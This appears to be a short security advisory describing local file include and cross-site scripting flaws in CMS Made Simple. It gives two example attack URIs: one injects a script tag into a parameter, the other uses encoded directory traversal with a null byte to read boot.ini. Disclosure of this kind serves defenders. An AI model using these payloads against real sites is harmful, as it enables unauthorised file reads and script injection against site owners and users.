CMS Made Simple Local File Include and Cross Site Scripting Vulnerabilities

CMS Made Simple Local File Include and Cross Site Scripting Vulnerabilities

Attackers can exploit these issues via a browser. To exploit a cross-site scripting issue, attackers must entice an unsuspecting user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/cmsmadesimple/index.php?page=tags-in-the-core&showtemplate=false"><script>alert('XSS')</script>
http://www.example.com/cmsmadesimple/index.php?mact=News%2ccntnt01%2c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5c..%5c..%5c%5cboot.ini%00%2c0&cntnt01articleid=1&cntnt01showtemplate=false&cntnt01returnid=39